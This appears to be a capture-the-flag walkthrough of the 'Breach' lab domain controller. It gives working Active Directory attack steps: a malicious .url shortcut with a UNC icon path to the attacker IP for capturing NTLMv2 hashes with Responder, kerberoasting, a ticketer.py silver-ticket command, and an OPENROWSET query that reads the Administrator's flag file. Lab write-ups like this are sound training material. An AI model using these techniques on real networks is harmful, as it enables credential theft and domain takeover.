🛠️Breach

You will learn about capturing hashes from placing files in shares & silver tickets

IP

10.10.99.74

Enumeration

We have a DC with domain breach.vl and hostname BREACHDC.breach.vl Nmap scan reveals a IIS webserver and Microsoft SQL service 2019 installed

Placing files in Shares

Enumerating SMB we find a share folder

In the transfer folder we find 3 folders with possible AD usernames

We cannot list or place files inside these User's folders

But we can place stuff in the other folders

[InternetShortcut]
URL=test
WorkingDirectory=test
IconFile=\\10.8.0.199\%USERNAME%.icon
IconIndex=1  

We run Responder and when a user visits the folder with our shortcut inside we get a NTLMv2 hash

We crack the hash and we get a password

MSSQL Privilege Escalation

Now we enumerate the domain with bloodhound

The MSSQL service account is kerberoastable

We got the password for the service account too

Now that we have the password we can create a Silver ticket and impersonate any account

We need the domain SID, we can find it in bloodhound

And the MSSQL NTLM password hash

ticketer.py -nthash 695..... -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip BREACHDC.breach.vl -spn MSSQLSVC/BREACHDC.breach.vl:1433 Administrator

We now have access to the DC

I tried to get a shell using xp_cmdshell but defender said nope and it was 2 am, i wanted to go to bed...

We can directly read the root flag without getting a shell

 SELECT * FROM OPENROWSET(BULK 'C:\Users\Administrator\Desktop\root.txt',SINGLE_CLOB) AS FileContents;

Last updated

Was this helpful?